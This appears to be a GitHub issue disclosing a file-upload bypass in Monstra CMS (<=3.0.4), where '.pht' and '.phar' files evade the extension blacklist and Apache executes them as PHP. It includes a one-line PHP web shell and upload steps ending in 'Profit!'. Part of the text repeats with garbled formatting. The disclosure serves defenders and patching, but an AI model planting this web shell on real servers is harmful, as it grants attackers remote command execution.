Brief of this vulnerability
In uploading process, Monstra filters some of dangerous extensions using blacklist. But it is not perfect because default setting of "libapache2-mod-php" allow some extensions to execute php scripts.
Test Environment
Apache/2.4.10 (Debian)
PHP 5.6.33-0+deb8u1 (cli)
Affect version
<=3.0.4
Payload
move to http://[address]:[port]/[app_path]/admin/index.php?id=filesmanager with login
Save php codes with '.pht' extensions. and upload it like below.
# cmd.pht
<?php system($_GET['c']);?>
Click the uploaded file name or
move to http://[address]:[port]/[app_path]/public/uploads/[uploaded file]
Profit!
Reason of This Vulnerability
Default setting of php5 module for apache2(libapache2-mod-php5) allow several extensions to execute as php script. This is some part of /etc/apache2/mods-enabled/php5.conf.
#/etc/apache2/mods-enabled/php5.conf
<FilesMatch ".+\.ph(p[345]?|t|tml)$">
SetHandler application/x-httpd-php
</FilesMatch>
<FilesMatch ".+\.phps$">
SetHandler application/x-httpd-php-source
# Deny access to raw php sources by default
# To re-enable it's recommended to enable access to the files
# only in specific virtual host or directory
Require all denied
</FilesMatch>
Because of this config, list of extension allowed to run php script is
php, php3, php4, php5, **pht**, phtml
and 'phps' extension shows source code of php file.
But Monstra prevent to upload php-style files using extension filer in uploading process at ./plugins/box/filesmanager/filesmanager.admin.php like below.
Almost allowed extensions to execute as php can be filtered but 'pht' is not.
As a result, attacker can upload malicious php file using pht extensions.
Similar with this, default setting of 'libapache2-mod-php7.1' like this.
#OS:ubuntu 17.10
#/etc/apache2/mods-enabled/php7.1.conf
<FilesMatch ".+\.ph(ar|p|tml)$">
SetHandler application/x-httpd-php
</FilesMatch>
<FilesMatch ".+\.phps$">
SetHandler application/x-httpd-php-source
# Deny access to raw php sources by default
# To re-enable it's recommended to enable access to the files
# only in specific virtual host or directory
Require all denied
</FilesMatch>
So, phar extension can also be vulnerable in php7 environment.
Hexife
commented
5 years ago
Brief of this vulnerability In uploading process, Monstra filters some of dangerous extensions using blacklist. But it is not perfect because default setting of "libapache2-mod-php" allow some extensions to execute php scripts.
Test Environment
Affect version <=3.0.4
Payload
move to
http://[address]:[port]/[app_path]/admin/index.php?id=filesmanagerwith loginSave php codes with '.pht' extensions. and upload it like below.
Click the uploaded file name or move to
http://[address]:[port]/[app_path]/public/uploads/[uploaded file]Profit!
Reason of This Vulnerability Default setting of php5 module for apache2(libapache2-mod-php5) allow several extensions to execute as php script. This is some part of
/etc/apache2/mods-enabled/php5.conf.Because of this config, list of extension allowed to run php script is
php, php3, php4, php5, **pht**, phtmland 'phps' extension shows source code of php file.But Monstra prevent to upload php-style files using extension filer in uploading process at
./plugins/box/filesmanager/filesmanager.admin.phplike below.Almost allowed extensions to execute as php can be filtered but 'pht' is not.
As a result, attacker can upload malicious php file using
phtextensions.Similar with this, default setting of 'libapache2-mod-php7.1' like this.
So,
pharextension can also be vulnerable in php7 environment.